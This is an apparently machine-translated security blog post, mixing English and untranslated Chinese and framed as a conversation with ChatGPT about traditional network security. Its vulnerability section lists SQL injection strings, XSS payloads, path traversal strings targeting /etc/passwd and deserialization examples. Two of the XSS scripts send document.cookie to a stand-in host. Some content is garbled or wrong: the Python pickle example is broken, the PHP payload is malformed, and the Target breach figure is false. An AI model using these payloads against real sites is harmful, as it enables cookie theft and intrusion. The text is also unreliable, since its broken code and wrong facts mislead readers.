ChatGPT: Do you really understand cybersecurity? Talking about traditional network security when attack defense is in progress

ChatGPT (full name: Chat Generative Pre-trained Transformer), a chat robot program developed by OpenAI in the United States, is a natural language processing tool driven by artificial intelligence technology.

Based on the characteristics of its large language model, controllability, and high scalability, this article talks about the progress of network security attack defense through a conversation with ChatGPT.

Directory index:
ChatGPT: Do you really understand network security? Talking about traditional network security when network security attack defense is in progress

ChatGPT: Do you really understand cybersecurity? Talking about the new definition of network security when network security attack defense is in progress

ChatGPT: Do you really understand cybersecurity? Talking about the New Threats of Network Attacks During Network Security Attack Defense

ChatGPT: Do you really understand cybersecurity? Talking about the new defense of network security when the network security attack defense is in progress

ChatGPT: Do you really understand cybersecurity? Talking about the new summary of network security when network security attack defense is in progress

traditional network security

提问ChatGPT：What is traditional network security, and what are the main aspects?
ChatGPTAnswer the following:

传统的网络安全主要是指对计算机网络系统的保护和防御措施，
以保护计算机网络不受攻击、破坏或窃取敏感数据。

Based on the general understanding and practice in the field of network security, traditional network security mainly includes the following aspects:

1. firewall

Threats: Malicious attacks such as intrusions, Trojan horses, and viruses. Hackers may break through the firewall through loopholes or social engineering, and attack and tamper within the system.

2013年，美国零售巨头塔吉特公司（Target）的网络系统遭到黑客攻击，导致近700万张信用卡数据泄露。调查结果表明，黑客是通过一名供应商的帐号登录了塔吉特公司的网络，然后利用漏洞绕过了防火墙，最后成功入侵系统，窃取大量敏感数据。

Preventive measures: Strengthen the security and reliability of the firewall, including setting complex passwords, regularly updating software and other measures. In addition, advanced security devices such as IPS and IDS can also be used to conduct in-depth screening of network traffic to detect and block potential attacks in a timely manner.

2. Encryption Technology

Threats: data leakage, theft and tampering, etc. Hackers may steal encrypted data by intercepting packets, malware, etc., and tamper with it.

2017年，全球最大的金融机构之一的美国信用报告公司Equifax遭受了历史上最大的数据泄露事件之一，超过1.43亿人的个人信息和社会安全号码被盗。事件调查发现，黑客利用了一个已知漏洞，从而绕过了Equifax的加密机制，获取了大量的敏感数据。

Some encryption algorithms have been widely recognized as insecure or vulnerable, such as:

MD5：MD5是一种常用的哈希算法，但它已经被证明存在严重的弱点和碰撞攻击，并且不再适合用于安全敏感的应用程序中。

SHA-1：SHA-1也是一种常见的哈希算法，但它已经被证明存在严重的碰撞攻击和安全问题，并且已经被推荐不再使用。

RC4：RC4是一种对称加密算法，曾在许多应用程序中广泛使用。但是，它被证明存在严重的安全问题，并且被建议不再使用。

Preventive measures: use more secure encryption algorithms and key management mechanisms, and also need to verify the randomness, unpredictability and integrity of the encryption protocol. In addition, technologies such as digital certificate authentication are used to ensure the identity authenticity and information security of both communication parties.

3. Authentication and Authorization

Threats: password cracking, fake identities, etc. Hackers may obtain account passwords and identity certificates of legitimate users through brute force cracking, social engineering, phishing, etc., to gain unauthorized access.

2018年，Facebook 遭到了一次大规模的黑客攻击，影响到了超过5000万用户的账户。黑客利用一个代码漏洞，盗用了大量的访问令牌，从而获取了用户的个人信息和私密消息。这次事件直接暴露了 Facebook 认证机制的漏洞，也引起了人们对社交媒体隐私的关注。

Preventive measures: adopt more secure and complex password policies and authentication mechanisms, such as multi-factor authentication. In addition, strict access control and audit mechanisms need to be implemented to avoid unauthorized access and malicious behavior.

4. Vulnerability Management

Threat: Hackers may exploit system vulnerabilities to attack and infiltrate.

2019年，美国政府网络安全机构 NSA 发布了一份警告，称黑客组织正在利用漏洞攻击一些受害者的 VPN 门户。这些攻击活动被称为“Pulse Secure VPN”攻击，黑客利用了特定版本 VPN 的漏洞，以获取管理员授权、执行代码和窃取敏感数据等。

Common attack methods of SQL injection:

select * from users where name='qiu' or 1=1 # and password='xxx'

select * from user where name='qiu' or 1=1 #' and pass=''

SELECT * FROM users WHERE id=1 AND 1=(SELECT COUNT(*) FROM users GROUP BY CONCAT_WS(':', username, password));

SELECT * FROM users WHERE name='输入的用户名';

SELECT * FROM users WHERE name='' CONVERT(int, (SELECT TOP 1 password_hash FROM users)) 
-- ';

SELECT * FROM users WHERE username = 'qiu'--'  AND password = 'xx'

SELECT * FROM users WHERE id = 1 AND (SELECT COUNT(*) FROM users) > 0

SELECT * FROM users WHERE username='admin' UNION SELECT credit_card_number, expiration_date FROM credit_cards

SELECT * FROM users WHERE username='admin' UNION SELECT NULL,NULL,NULL FROM information_schema.tables --

For details, please refer to: [Network Security] A Brief Analysis of SQL Injection Principles and Common Attack Methods

Common xss attack methods:

Basic PAYLOAD:

<script>alert('XSS')</script>

A prompt box pops up directly

---

Image loading PAYLOAD:

<img src=x onerror="alert('XSS!')">

When this image is loaded, a malicious script will be triggered

---

Link to jump PAYLOAD:

<a href="javascript:alert('XSS')">点击我</a>

When the user clicks on the link, the script in it is executed

---

Cookie stealing PAYLOAD:

<script>new Image().src="http://xx.com/steal.php?cookie="+document.cookie;</script>

Send the user's cookie information to the remote server

---

Jump to the fake login page PAYLOAD:

 <script>document.location="http://xx.com/login.php?user="+document.cookie;</script>

Pretending to be a login page to trick users into submitting usernames and passwords

---

The file contains common attack vectors:

相对路径Payload：Some applications may allow users to enter a relative path, and an attacker can use relative path qualifiers such as ".../" to access files outside the application directory.

../etc/passwd（将会列出除root以外的所有Linux用户信息）

绝对路径Payload：Attackers can use absolute paths to access files in the system, such as /etc/passwd, etc.

NULL字节Payload：Some applications only recognize the character before the null byte when processing the file name, and ignore the content after it. Therefore, an attacker could add "%00" or "\0" (the null character) to the filename, tricking the application into accessing only the file they specify.

../../../../../../../../../../etc/passwd%00

PHP伪协议Payload：If the application uses PHP as the server-side script interpreter, an attacker can use the PHP pseudo-protocol to access remote files.

  php://filter/convert.base64-encode/resource=../../../etc/passwd

其他协议Payload：In addition to the php protocol, attackers can also use other protocols to read remote files, such as file, ftp, etc.

file:///etc/passwd

---

Common serialization and deserialization attack methods:
Java uses Payload: A common serialization and deserialization attack method in Java is to use the ObjectInputStream class to attack. The attacker can construct a serialized object containing malicious code, for example:

public class Exploit implements Serializable {
    
    
  public Exploit() throws Exception {
    
    
    Runtime.getRuntime().exec("calc.exe");
    }
 }

This object is then serialized and sent over the network to the target application, where running the serialized object executes malicious code (in this case, opening a calculator).

PHP uses Payload: A common serialization and deserialization attack method in PHP is to use the unserialize function to execute arbitrary code. An attacker can construct a serialized string containing malicious code, for example:

O:6:"Exploit":0:{
    
    }

When the application parses this string using the unserialize function, malicious code is executed.

Python uses Payload: Python supports serialization and deserialization of objects using the pickle module. An attacker can construct a malicious code and use pickle.dump to serialize it, for example:

import os
class Exploit(object):
def reduce(self):
return (os.system,('calc.exe',))

Then send the serialized malicious code to the target system, and use pickle.load to execute the malicious code.

---

Preventive measures: Establish and implement a sound vulnerability management system to discover and repair system vulnerabilities in a timely manner. At the same time, regular vulnerability scanning and assessment are also required to ensure the security and stability of the system.

5. security strategy

Threats: Factors such as imperfect security policies and inadequate implementation may lead to system hacking and intrusion.

2007年，中国移动曾因为短信群发功能易被利用进行违法行为而被罚款，这直接暴露出其安全策略存在缺陷和漏洞。此后，中国移动加强了对短信平台的监管和管理，并加强了电子认证及授权方面的技术和应用，提高了对违法行为的识别和预防能力。

Preventive measures: Establish sound security policies and rules, including network access control, data backup, emergency response, etc. At the same time, it is also necessary to strengthen the training and awareness education of employees, improve their security awareness and capabilities, and reduce the impact of human factors on system security.

提问ChatGPT：What is the focus of traditional network security?
ChatGPT answers as follows:

Traditional network security measures focus on defending against external attacks and threats to ensure the security and stability of computer networks. However, with the rapid development of the digital age and the continuous improvement of informatization, network security is facing more and more challenges and new threats.

---

Summarize

The above is a brief discussion of traditional network security when attack defense is in progress.

关注我，遇见攻击新姿势，吸纳网安新知识。

I am Qiu said , see you next time.